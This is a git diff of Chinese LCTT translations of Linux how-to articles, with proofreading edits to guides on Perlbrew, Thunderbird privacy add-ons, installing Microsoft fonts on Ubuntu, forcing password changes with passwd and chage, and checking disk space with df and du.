什么比在系统上安装 Perl 更好?在系统中安装多个版本的 Perl。使用 [Perlbrew][1] 你可以做到这一点。但是为什么,除了让你包围在 Perl 下之外,你想要那样做吗?
|
有比在系统上安装了 Perl 更好的事情吗?那就是在系统中安装了多个版本的 Perl。使用 [Perlbrew][1] 你可以做到这一点。但是为什么呢,除了让你包围在 Perl 下之外,有什么好处吗?
|
||||||
|
|
||||||
简短的回答是不同版本的 Perl 是......不同的。程序 A 可能依赖于较新版本中不推荐使用的行为,而程序 B 需要去年无法使用的新功能。如果你安装了多个版本的 Perl,则每个脚本都可以使用最适合它的版本。如果您是开发人员,这也会派上用场,你可以针对多个版本的 Perl 测试你的程序,这样无论你的用户运行什么,你都知道它是否工作。
|
简短的回答是,不同版本的 Perl 是......不同的。程序 A 可能依赖于较新版本中不推荐使用的行为,而程序 B 需要去年无法使用的新功能。如果你安装了多个版本的 Perl,则每个脚本都可以使用最适合它的版本。如果您是开发人员,这也会派上用场,你可以针对多个版本的 Perl 测试你的程序,这样无论你的用户运行什么,你都知道它能否工作。
|
||||||
|
|
||||||
### 安装 Perlbrew
|
### 安装 Perlbrew
|
||||||
|
|
||||||
另一个好处是 Perlbrew 安装到用户的家目录。这意味着每个用户都可以管理他们的 Perl 版本(以及相关的 CPAN 包),而无需与系统管理员联系。自助服务意味着为用户提供更快的安装,并为系统管理员提供更多时间来解决难题。
|
另一个好处是 Perlbrew 会安装 Perl 到用户的家目录。这意味着每个用户都可以管理他们的 Perl 版本(以及相关的 CPAN 包),而无需与系统管理员联系。自助服务意味着为用户提供更快的安装,并为系统管理员提供更多时间来解决难题。
|
||||||
|
|
||||||
第一步是在你的系统上安装 Perlbrew。许多 Linux 发行版已经在包仓库中拥有它,因此你只需要 `dnf install perlbrew`(或者适用于你的发行版的命令)。你还可以使用 `cpan App::perlbrew` 从 CPAN 安装 `App::perlbrew` 模块。或者你可以在 [install.perlbrew.pl][2] 下载并运行安装脚本。
|
第一步是在你的系统上安装 Perlbrew。许多 Linux 发行版已经在包仓库中拥有它,因此你只需要 `dnf install perlbrew`(或者适用于你的发行版的命令)。你还可以使用 `cpan App::perlbrew` 从 CPAN 安装 `App::perlbrew` 模块。或者你可以在 [install.perlbrew.pl][2] 下载并运行安装脚本。
|
||||||
|
|
||||||
@ -18,56 +20,56 @@
|
|||||||
### 安装新的 Perl 版本
|
### 安装新的 Perl 版本
|
||||||
|
|
||||||
假设你想尝试最新的开发版本(撰写本文时为 5.27.11)。首先,你需要安装包:
|
假设你想尝试最新的开发版本(撰写本文时为 5.27.11)。首先,你需要安装包:
|
||||||
|
|
||||||
```
|
```
|
||||||
perlbrew install 5.27.11
|
perlbrew install 5.27.11
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### 切换 Perl 版本
|
### 切换 Perl 版本
|
||||||
|
|
||||||
现在你已经安装了新版本,你可以将它用于该 shell:
|
现在你已经安装了新版本,你可以将它用于该 shell:
|
||||||
|
|
||||||
```
|
```
|
||||||
perlbrew use 5.27.11
|
perlbrew use 5.27.11
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
或者你可以将其设置为你帐户的默认 Perl 版本(假设你按照 `perlbrew init` 的输出设置了你的配置文件):
|
或者你可以将其设置为你帐户的默认 Perl 版本(假设你按照 `perlbrew init` 的输出设置了你的配置文件):
|
||||||
|
|
||||||
```
|
```
|
||||||
perlbrew switch 5.27.11
|
perlbrew switch 5.27.11
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### 运行单个脚本
|
### 运行单个脚本
|
||||||
|
|
||||||
你也可以用特定版本的 Perl 运行单个命令:
|
你也可以用特定版本的 Perl 运行单个命令:
|
||||||
|
|
||||||
```
|
```
|
||||||
perlberew exec 5.27.11 myscript.pl
|
perlberew exec 5.27.11 myscript.pl
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
或者,你可以针对所有已安装的版本运行命令。如果你想针对各种版本运行测试,这尤其方便。在这种情况下,请将 Perl 指定版本:
|
或者,你可以针对所有已安装的版本运行命令。如果你想针对各种版本运行测试,这尤其方便。在这种情况下,请指定版本为 `perl`:
|
||||||
```
|
|
||||||
.plperlbrew exec perl myscriptpl
|
|
||||||
|
|
||||||
|
```
|
||||||
|
plperlbrew exec perl myscriptpl
|
||||||
```
|
```
|
||||||
|
|
||||||
### 安装 CPAN 模块
|
### 安装 CPAN 模块
|
||||||
|
|
||||||
如果你想安装 CPAN 模块,`cpanm` 包是一个易于使用的界面,可以很好地与 Perlbrew 一起使用。用下面命令安装它:
|
如果你想安装 CPAN 模块,`cpanm` 包是一个易于使用的界面,可以很好地与 Perlbrew 一起使用。用下面命令安装它:
|
||||||
```
|
|
||||||
perlbrew install-cpamn
|
|
||||||
|
|
||||||
|
```
|
||||||
|
perlbrew install-cpanm
|
||||||
```
|
```
|
||||||
|
|
||||||
然后,你可以使用 `cpanm` 命令安装 CPAN 模块:
|
然后,你可以使用 `cpanm` 命令安装 CPAN 模块:
|
||||||
|
|
||||||
```
|
```
|
||||||
cpanm CGI::simple
|
cpanm CGI::simple
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### 但是等下,还有更多!
|
### 但是等下,还有更多!
|
||||||
|
|
||||||
本文介绍了基本的 Perlbrew 用法。还有更多功能和选项可供选择。从查看 `perlbrew help` 的输出开始,或查看[ App::perlbrew 文档][3]。你还喜欢 Perlbrew 的其他什么功能?让我们在评论中知道。
|
本文介绍了基本的 Perlbrew 用法。还有更多功能和选项可供选择。从查看 `perlbrew help` 的输出开始,或查看[App::perlbrew 文档][3]。你还喜欢 Perlbrew 的其他什么功能?让我们在评论中知道。
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
@ -76,7 +78,7 @@ via: https://opensource.com/article/18/7/perlbrew
|
|||||||
作者:[Ben Cotton][a]
|
作者:[Ben Cotton][a]
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
译者:[geekpi](https://github.com/geekpi)
|
译者:[geekpi](https://github.com/geekpi)
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
@ -0,0 +1,64 @@
|
|||||||
|
4 个提高你在 Thunderbird 上隐私的加载项
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://fedoramagazine.org/wp-content/uploads/2017/08/tb-privacy-addons-816x345.jpg)
|
||||||
|
|
||||||
|
Thunderbird 是由 [Mozilla][1] 开发的流行的免费电子邮件客户端。与 Firefox 类似,Thunderbird 提供了大量加载项来用于额外功能和自定义。本文重点介绍四个加载项,以改善你的隐私。
|
||||||
|
|
||||||
|
### Enigmail
|
||||||
|
|
||||||
|
使用 GPG(GNU Privacy Guard)加密电子邮件是保持其内容私密性的最佳方式。如果你不熟悉 GPG,请[查看我们在这里的入门介绍][2]。
|
||||||
|
|
||||||
|
[Enigmail][3] 是使用 OpenPGP 和 Thunderbird 的首选加载项。实际上,Enigmail 与 Thunderbird 集成良好,可让你加密、解密、数字签名和验证电子邮件。
|
||||||
|
|
||||||
|
### Paranoia
|
||||||
|
|
||||||
|
[Paranoia][4] 可让你查看有关收到的电子邮件的重要信息。用一个表情符号显示电子邮件在到达收件箱之前经过的服务器之间的加密状态。
|
||||||
|
|
||||||
|
黄色、快乐的表情告诉你所有连接都已加密。蓝色、悲伤的表情意味着有一个连接未加密。最后,红色的、害怕的表情表示在多个连接上该消息未加密。
|
||||||
|
|
||||||
|
还有更多有关这些连接的详细信息,你可以用来检查哪台服务器用于投递邮件。
|
||||||
|
|
||||||
|
### Sensitivity Header
|
||||||
|
|
||||||
|
[Sensitivity Header][5] 是一个简单的加载项,可让你选择外发电子邮件的隐私级别。使用选项菜单,你可以选择敏感度:正常、个人、隐私和机密。
|
||||||
|
|
||||||
|
添加此标头不会为电子邮件添加额外的安全性。但是,某些电子邮件客户端或邮件传输/用户代理(MTA/MUA)可以使用此标头根据敏感度以不同方式处理邮件。
|
||||||
|
|
||||||
|
请注意,开发人员将此加载项标记为实验性的。
|
||||||
|
|
||||||
|
### TorBirdy
|
||||||
|
|
||||||
|
如果你真的担心自己的隐私,[TorBirdy][6] 就是给你设计的加载项。它将 Thunderbird 配置为使用 [Tor][7] 网络。
|
||||||
|
|
||||||
|
据其[文档][8]所述,TorBirdy 为以前没有使用 Tor 的电子邮件帐户提供了少量隐私保护。
|
||||||
|
|
||||||
|
> 请记住,跟之前使用 Tor 访问的电子邮件帐户相比,之前没有使用 Tor 访问的电子邮件帐户提供**更少**的隐私/匿名/更弱的假名。但是,TorBirdy 仍然对现有帐户或实名电子邮件地址有用。例如,如果你正在寻求隐匿位置 —— 你经常旅行并且不想通过发送电子邮件来披露你的所有位置 —— TorBirdy 非常有效!
|
||||||
|
|
||||||
|
请注意,要使用此加载项,必须在系统上安装 Tor。
|
||||||
|
|
||||||
|
照片由 [Braydon Anderson][9] 在 [Unsplash][10] 上发布。
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://fedoramagazine.org/4-addons-privacy-thunderbird/
|
||||||
|
|
||||||
|
作者:[Clément Verna][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[geekpi](https://github.com/geekpi)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://fedoramagazine.org
|
||||||
|
[1]:https://www.mozilla.org/en-US/
|
||||||
|
[2]:https://fedoramagazine.org/gnupg-a-fedora-primer/
|
||||||
|
[3]:https://addons.mozilla.org/en-US/thunderbird/addon/enigmail/
|
||||||
|
[4]:https://addons.mozilla.org/en-US/thunderbird/addon/paranoia/?src=cb-dl-users
|
||||||
|
[5]:https://addons.mozilla.org/en-US/thunderbird/addon/sensitivity-header/?src=cb-dl-users
|
||||||
|
[6]:https://addons.mozilla.org/en-US/thunderbird/addon/torbirdy/?src=cb-dl-users
|
||||||
|
[7]:https://www.torproject.org/
|
||||||
|
[8]:https://trac.torproject.org/projects/tor/wiki/torbirdy
|
||||||
|
[9]:https://unsplash.com/photos/wOHH-NUTvVc?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText
|
||||||
|
[10]:https://unsplash.com/search/photos/privacy?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText
|
@ -1,23 +1,24 @@
|
|||||||
在 Ubuntu 18.04 LTS 上安装 Microsoft Windows 字体
|
在 Ubuntu 18.04 LTS 上安装 Microsoft Windows 字体
|
||||||
======
|
======
|
||||||
|
|
||||||
![](https://www.ostechnix.com/wp-content/uploads/2016/07/Install-Microsoft-Windows-Fonts-in-Ubuntu-1-720x340.png)
|
![](https://www.ostechnix.com/wp-content/uploads/2016/07/Install-Microsoft-Windows-Fonts-in-Ubuntu-1-720x340.png)
|
||||||
|
|
||||||
大多数教育机构仍在使用 Microsoft 字体, 我不清楚其他国家是什么情况。但在泰米尔纳德邦(印度的一个州), **Times New Roman** 和 **Arial** 字体主要被用于大学和学校的几乎所有文档工作,项目和作业。不仅是教育机构,而且一些小型组织,办公室和商店仍在使用 MS Windows 字体。以防万一,如果你需要在 Ubuntu 桌面版上使用 Microsoft 字体,请按照以下步骤安装。
|
大多数教育机构仍在使用 Microsoft 字体, 我不清楚其他国家是什么情况。但在泰米尔纳德邦(印度的一个州), **Times New Roman** 和 **Arial** 字体主要被用于大学和学校的几乎所有文档工作、项目和作业。不仅是教育机构,而且一些小型组织、办公室和商店仍在使用 MS Windows 字体。以防万一,如果你需要在 Ubuntu 桌面版上使用 Microsoft 字体,请按照以下步骤安装。
|
||||||
|
|
||||||
**免责声明**: Microsoft 已免费发布其核心字体。 但**请不要在其他操作系统中禁止使用 Microsoft 字体**。在任何 Linux 操作系统中安装 MS 字体之前请仔细阅读 EULA 。我们(OSTechNix)不负责这种任何种类的盗版行为。
|
**免责声明**: Microsoft 已免费发布其核心字体。 但**请注意 Microsoft 字体是禁止使用在其他操作系统中**。在任何 Linux 操作系统中安装 MS 字体之前请仔细阅读 EULA 。我们不负责这种任何种类的盗版行为。
|
||||||
|
|
||||||
|
(LCTT 译注:本文只做技术探讨,并不代表作者、译者和本站鼓励任何行为。)
|
||||||
|
|
||||||
### 在 Ubuntu 18.04 LTS 桌面版上安装 MS 字体
|
### 在 Ubuntu 18.04 LTS 桌面版上安装 MS 字体
|
||||||
|
|
||||||
如下所示安装 MS TrueType 字体:
|
如下所示安装 MS TrueType 字体:
|
||||||
|
|
||||||
```
|
```
|
||||||
$ sudo apt update
|
$ sudo apt update
|
||||||
|
|
||||||
$ sudo apt install ttf-mscorefonts-installer
|
$ sudo apt install ttf-mscorefonts-installer
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
然后将会出现 Microsoft 的最终用户协议向导,点击 **OK** 以继续。
|
然后将会出现 Microsoft 的最终用户协议向导,点击 **OK** 以继续。
|
||||||
|
|
||||||
![][2]
|
![][2]
|
||||||
|
|
||||||
@ -26,12 +27,13 @@ $ sudo apt install ttf-mscorefonts-installer
|
|||||||
![][3]
|
![][3]
|
||||||
|
|
||||||
安装字体之后, 我们需要使用命令行来更新字体缓存:
|
安装字体之后, 我们需要使用命令行来更新字体缓存:
|
||||||
|
|
||||||
```
|
```
|
||||||
$ sudo fc-cache -f -v
|
$ sudo fc-cache -f -v
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
**示例输出:**
|
**示例输出:**
|
||||||
|
|
||||||
```
|
```
|
||||||
/usr/share/fonts: caching, new cache contents: 0 fonts, 6 dirs
|
/usr/share/fonts: caching, new cache contents: 0 fonts, 6 dirs
|
||||||
/usr/share/fonts/X11: caching, new cache contents: 0 fonts, 4 dirs
|
/usr/share/fonts/X11: caching, new cache contents: 0 fonts, 4 dirs
|
||||||
@ -106,60 +108,54 @@ $ sudo fc-cache -f -v
|
|||||||
/home/sk/.cache/fontconfig: cleaning cache directory
|
/home/sk/.cache/fontconfig: cleaning cache directory
|
||||||
/home/sk/.fontconfig: not cleaning non-existent cache directory
|
/home/sk/.fontconfig: not cleaning non-existent cache directory
|
||||||
fc-cache: succeeded
|
fc-cache: succeeded
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
### 在 Linux 和 Windows 双启动的机器上安装 MS 字体
|
### 在 Linux 和 Windows 双启动的机器上安装 MS 字体
|
||||||
|
|
||||||
如果你有 Linux 和 Windows 的双启动系统,你可以轻松地从 Windows C 驱动器上安装 MS 字体。
|
如果你有 Linux 和 Windows 的双启动系统,你可以轻松地从 Windows C 驱动器上安装 MS 字体。
|
||||||
你所要做的就是挂载 Windows 分区(C:/windows)。
|
你所要做的就是挂载 Windows 分区(C:/windows)。
|
||||||
|
|
||||||
我假设你已经在 Linux 中将 **C:\Windows** 分区挂载在了 **/Windowsdrive** 目录下。
|
我假设你已经在 Linux 中将 `C:\Windows` 分区挂载在了 `/Windowsdrive` 目录下。
|
||||||
|
|
||||||
|
现在,将字体位置链接到你的 Linux 系统的字体文件夹,如下所示:
|
||||||
|
|
||||||
现在,将字体位置链接到你的 Linux 系统的字体文件夹,如下所示。
|
|
||||||
```
|
```
|
||||||
ln -s /Windowsdrive/Windows/Fonts /usr/share/fonts/WindowsFonts
|
ln -s /Windowsdrive/Windows/Fonts /usr/share/fonts/WindowsFonts
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
链接字体文件之后,使用命令行重新生成 fontconfig 缓存::
|
链接字体文件之后,使用命令行重新生成 fontconfig 缓存:
|
||||||
|
|
||||||
```
|
```
|
||||||
fc-cache
|
fc-cache
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
或者,将所有的 Windows 字体复制到 **/usr/share/fonts** 目录下并使用一下命令安装字体:
|
或者,将所有的 Windows 字体复制到 `/usr/share/fonts` 目录下并使用一下命令安装字体:
|
||||||
|
|
||||||
```
|
```
|
||||||
mkdir /usr/share/fonts/WindowsFonts
|
mkdir /usr/share/fonts/WindowsFonts
|
||||||
|
|
||||||
cp /Windowsdrive/Windows/Fonts/* /usr/share/fonts/WindowsFonts
|
cp /Windowsdrive/Windows/Fonts/* /usr/share/fonts/WindowsFonts
|
||||||
|
|
||||||
chmod 755 /usr/share/fonts/WindowsFonts/*
|
chmod 755 /usr/share/fonts/WindowsFonts/*
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
最后,使用命令行重新生成 fontconfig 缓存:
|
最后,使用命令行重新生成 fontconfig 缓存:
|
||||||
|
|
||||||
```
|
```
|
||||||
fc-cache
|
fc-cache
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### 测试 Windows 字体
|
### 测试 Windows 字体
|
||||||
|
|
||||||
|
|
||||||
安装 MS 字体后打开 LibreOffice 或 GIMP。 现在,你将会看到 Microsoft coretype 字体。
|
安装 MS 字体后打开 LibreOffice 或 GIMP。 现在,你将会看到 Microsoft coretype 字体。
|
||||||
|
|
||||||
![][4]
|
![][4]
|
||||||
|
|
||||||
就是这样, 希望这本指南有用。我再次警告你,在其他操作系统中使用 MS 字体是被禁止的。在安装 MS 字体之前请先阅读 Microsoft 许可协议。
|
就是这样, 希望这本指南有用。我再次警告你,在其他操作系统中使用 MS 字体是被禁止的。在安装 MS 字体之前请先阅读 Microsoft 许可协议。
|
||||||
|
|
||||||
如果你觉得我们的指南有用,请在你的社区、专业网络上分享并支持 OSTechNix。还有更多好东西在等着我们。持续访问!
|
如果你觉得我们的指南有用,请在你的社区、专业网络上分享并支持我们。还有更多好东西在等着我们。持续访问!
|
||||||
|
|
||||||
庆祝吧!!
|
庆祝吧!!
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
via: https://www.ostechnix.com/install-microsoft-windows-fonts-ubuntu-16-04/
|
via: https://www.ostechnix.com/install-microsoft-windows-fonts-ubuntu-16-04/
|
||||||
@ -167,7 +163,7 @@ via: https://www.ostechnix.com/install-microsoft-windows-fonts-ubuntu-16-04/
|
|||||||
作者:[SK][a]
|
作者:[SK][a]
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
译者:[Auk7F7](https://github.com/Auk7F7)
|
译者:[Auk7F7](https://github.com/Auk7F7)
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
@ -0,0 +1,157 @@
|
|||||||
|
如何强制用户在下次登录 Linux 时更改密码
|
||||||
|
======
|
||||||
|
|
||||||
|
当你使用默认密码创建用户时,你必须强制用户在下一次登录时更改密码。
|
||||||
|
|
||||||
|
当你在一个组织中工作时,此选项是强制性的。因为老员工可能知道默认密码,他们可能会也可能不会尝试不当行为。
|
||||||
|
|
||||||
|
这是安全投诉之一,所以,确保你必须以正确的方式处理此事而无任何失误。即使是你的团队成员也要一样做。
|
||||||
|
|
||||||
|
大多数用户都很懒,除非你强迫他们更改密码,否则他们不会这样做。所以要做这个实践。
|
||||||
|
|
||||||
|
出于安全原因,你需要经常更改密码,或者至少每个月更换一次。
|
||||||
|
|
||||||
|
确保你使用的是难以猜测的密码(大小写字母,数字和特殊字符的组合)。它至少应该为 10-15 个字符。
|
||||||
|
|
||||||
|
我们运行了一个 shell 脚本来在 Linux 服务器中创建一个用户账户,它会自动为用户附加一个密码,密码是实际用户名和少量数字的组合。
|
||||||
|
|
||||||
|
我们可以通过使用以下两种方法来实现这一点:
|
||||||
|
|
||||||
|
* passwd 命令
|
||||||
|
* chage 命令
|
||||||
|
|
||||||
|
**建议阅读:**
|
||||||
|
|
||||||
|
- [如何在 Linux 上检查用户所属的组][1]
|
||||||
|
- [如何在 Linux 上检查创建用户的日期][2]
|
||||||
|
- [如何在 Linux 中重置/更改用户密码][3]
|
||||||
|
- [如何使用 passwd 命令管理密码过期和老化][4]
|
||||||
|
|
||||||
|
### 方法 1:使用 passwd 命令
|
||||||
|
|
||||||
|
`passwd` 的意思是“密码”。它用于更新用户的身份验证令牌。`passwd` 命令/实用程序用于设置、修改或更改用户的密码。
|
||||||
|
|
||||||
|
普通的用户只能更改自己的账户,但超级用户可以更改任何账户的密码。
|
||||||
|
|
||||||
|
此外,我们还可以使用其他选项,允许用户执行其他活动,例如删除用户密码、锁定或解锁用户账户、设置用户账户的密码过期时间等。
|
||||||
|
|
||||||
|
在 Linux 中这可以通过调用 Linux-PAM 和 Libuser API 执行。
|
||||||
|
|
||||||
|
在 Linux 中创建用户时,用户详细信息将存储在 `/etc/passwd` 文件中。`passwd` 文件将每个用户的详细信息保存为带有七个字段的单行。
|
||||||
|
|
||||||
|
此外,在 Linux 系统中创建新用户时,将更新以下四个文件。
|
||||||
|
|
||||||
|
* `/etc/passwd`: 用户详细信息将在此文件中更新。
|
||||||
|
* `/etc/shadow`: 用户密码信息将在此文件中更新。
|
||||||
|
* `/etc/group`: 新用户的组详细信息将在此文件中更新。
|
||||||
|
* `/etc/gshadow`: 新用户的组密码信息将在此文件中更新。
|
||||||
|
|
||||||
|
#### 如何使用 passwd 命令执行此操作
|
||||||
|
|
||||||
|
我们可以使用 `passwd` 命令并添加 `-e` 选项来执行此操作。
|
||||||
|
|
||||||
|
为了测试这一点,让我们创建一个新用户账户,看看它是如何工作的。
|
||||||
|
|
||||||
|
```
|
||||||
|
# useradd -c "2g Admin - Magesh M" magesh && passwd magesh
|
||||||
|
Changing password for user magesh.
|
||||||
|
New password:
|
||||||
|
Retype new password:
|
||||||
|
passwd: all authentication tokens updated successfully.
|
||||||
|
```
|
||||||
|
|
||||||
|
使用户账户的密码失效,那么在下次登录尝试期间,用户将被迫更改密码。
|
||||||
|
|
||||||
|
```
|
||||||
|
# passwd -e magesh
|
||||||
|
Expiring password for user magesh.
|
||||||
|
passwd: Success
|
||||||
|
```
|
||||||
|
|
||||||
|
当我第一次尝试使用此用户登录系统时,它要求我设置一个新密码。
|
||||||
|
|
||||||
|
```
|
||||||
|
login as: magesh
|
||||||
|
[email protected]'s password:
|
||||||
|
You are required to change your password immediately (root enforced)
|
||||||
|
WARNING: Your password has expired.
|
||||||
|
You must change your password now and login again!
|
||||||
|
Changing password for user magesh.
|
||||||
|
Changing password for magesh.
|
||||||
|
(current) UNIX password:
|
||||||
|
New password:
|
||||||
|
Retype new password:
|
||||||
|
passwd: all authentication tokens updated successfully.
|
||||||
|
Connection to localhost closed.
|
||||||
|
```
|
||||||
|
|
||||||
|
### 方法 2:使用 chage 命令
|
||||||
|
|
||||||
|
`chage` 意即“改变时间”。它会更改用户密码过期信息。
|
||||||
|
|
||||||
|
`chage` 命令会改变上次密码更改日期之后需要修改密码的天数。系统使用此信息来确定用户何时必须更改他/她的密码。
|
||||||
|
|
||||||
|
它允许用户执行其他活动,例如设置帐户到期日期,到期后设置密码失效,显示帐户过期信息,设置密码更改前的最小和最大天数以及设置到期警告天数。
|
||||||
|
|
||||||
|
#### 如何使用 chage 命令执行此操作
|
||||||
|
|
||||||
|
让我们在 `chage` 命令的帮助下,通过添加 `-d` 选项执行此操作。
|
||||||
|
|
||||||
|
为了测试这一点,让我们创建一个新用户帐户,看看它是如何工作的。我们将创建一个名为 `thanu` 的用户帐户。
|
||||||
|
|
||||||
|
```
|
||||||
|
# useradd -c "2g Editor - Thanisha M" thanu && passwd thanu
|
||||||
|
Changing password for user thanu.
|
||||||
|
New password:
|
||||||
|
Retype new password:
|
||||||
|
passwd: all authentication tokens updated successfully.
|
||||||
|
```
|
||||||
|
|
||||||
|
要实现这一点,请使用 `chage` 命令将用户的上次密码更改日期设置为 0。
|
||||||
|
|
||||||
|
```
|
||||||
|
# chage -d 0 thanu
|
||||||
|
|
||||||
|
# chage -l thanu
|
||||||
|
Last password change : Jul 18, 2018
|
||||||
|
Password expires : never
|
||||||
|
Password inactive : never
|
||||||
|
Account expires : never
|
||||||
|
Minimum number of days between password change : 0
|
||||||
|
Maximum number of days between password change : 99999
|
||||||
|
Number of days of warning before password expires : 7
|
||||||
|
```
|
||||||
|
|
||||||
|
当我第一次尝试使用此用户登录系统时,它要求我设置一个新密码。
|
||||||
|
|
||||||
|
```
|
||||||
|
login as: thanu
|
||||||
|
[email protected]'s password:
|
||||||
|
You are required to change your password immediately (root enforced)
|
||||||
|
WARNING: Your password has expired.
|
||||||
|
You must change your password now and login again!
|
||||||
|
Changing password for user thanu.
|
||||||
|
Changing password for thanu.
|
||||||
|
(current) UNIX password:
|
||||||
|
New password:
|
||||||
|
Retype new password:
|
||||||
|
passwd: all authentication tokens updated successfully.
|
||||||
|
Connection to localhost closed.
|
||||||
|
```
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.2daygeek.com/how-to-force-user-to-change-password-on-next-login-in-linux/
|
||||||
|
|
||||||
|
作者:[Prakash Subramanian][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[MjSeven](https://github.com/MjSeven)
|
||||||
|
校对:[wxy](https://github.com/wxy)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.2daygeek.com/author/prakash/
|
||||||
|
[1]:https://www.2daygeek.com/how-to-check-which-groups-a-user-belongs-to-on-linux/
|
||||||
|
[2]:https://www.2daygeek.com/how-to-check-user-created-date-on-linux/
|
||||||
|
[3]:https://www.2daygeek.com/passwd-command-examples/
|
||||||
|
[4]:https://www.2daygeek.com/passwd-command-examples-part-l/
|
@ -1,6 +1,8 @@
|
|||||||
如何检查 Linux 中的可用磁盘空间
|
如何检查 Linux 中的可用磁盘空间
|
||||||
======
|
======
|
||||||
|
|
||||||
|
> 用这里列出的方便的工具来跟踪你的磁盘利用率。
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/find-file-linux-code_magnifying_glass_zero.png?itok=E2HoPDg0)
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/find-file-linux-code_magnifying_glass_zero.png?itok=E2HoPDg0)
|
||||||
|
|
||||||
跟踪磁盘利用率信息是系统管理员(和其他人)的日常待办事项列表之一。Linux 有一些内置的使用程序来帮助提供这些信息。
|
跟踪磁盘利用率信息是系统管理员(和其他人)的日常待办事项列表之一。Linux 有一些内置的使用程序来帮助提供这些信息。
|
||||||
@ -11,45 +13,48 @@
|
|||||||
|
|
||||||
`df -h` 以人类可读的格式显示磁盘空间。
|
`df -h` 以人类可读的格式显示磁盘空间。
|
||||||
|
|
||||||
`df -a` 显示文件系统的完整磁盘使用情况,即使 Available(可用) 字段为 0
|
`df -a` 显示文件系统的完整磁盘使用情况,即使 Available(可用) 字段为 0。
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/df-ha.png)
|
![](https://opensource.com/sites/default/files/uploads/df-ha.png)
|
||||||
|
|
||||||
`df -T` 显示磁盘使用情况以及每个块的文件系统类型(例如,xfs, ext2, ext3, btrfs 等)
|
`df -T` 显示磁盘使用情况以及每个块的文件系统类型(例如,xfs、ext2、ext3、btrfs 等)。
|
||||||
|
|
||||||
|
`df -i` 显示已使用和未使用的 inode。
|
||||||
|
|
||||||
`df -i` 显示已使用和未使用的 inodes
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/df-ti.png)
|
![](https://opensource.com/sites/default/files/uploads/df-ti.png)
|
||||||
|
|
||||||
### du
|
### du
|
||||||
|
|
||||||
`du` 显示文件,目录等的磁盘使用情况,默认情况下以 kb 为单位显示
|
`du` 显示文件,目录等的磁盘使用情况,默认情况下以 kb 为单位显示。
|
||||||
|
|
||||||
`du -h` 以人类可读的方式显示所有目录和子目录的磁盘使用情况
|
`du -h` 以人类可读的方式显示所有目录和子目录的磁盘使用情况。
|
||||||
|
|
||||||
`du -a` 显示所有文件的磁盘使用情况
|
`du -a` 显示所有文件的磁盘使用情况。
|
||||||
|
|
||||||
|
`du -s` 提供特定文件或目录使用的总磁盘空间。
|
||||||
|
|
||||||
`du -s` 提供特定文件或目录使用的总磁盘空间
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/du-has.png)
|
![](https://opensource.com/sites/default/files/uploads/du-has.png)
|
||||||
|
|
||||||
以下命令将检查 Linux 系统的总空间和使用空间。
|
|
||||||
|
|
||||||
### ls -al
|
### ls -al
|
||||||
|
|
||||||
`ls -al` 列出了特定目录的全部内容及大小。
|
`ls -al` 列出了特定目录的全部内容及大小。
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/ls-al.png)
|
![](https://opensource.com/sites/default/files/uploads/ls-al.png)
|
||||||
|
|
||||||
### stat
|
### stat
|
||||||
|
|
||||||
`stat <文件/目录> `显示文件/目录或文件系统的大小和其他统计信息。
|
`stat <文件/目录> `显示文件/目录或文件系统的大小和其他统计信息。
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/stat.png)
|
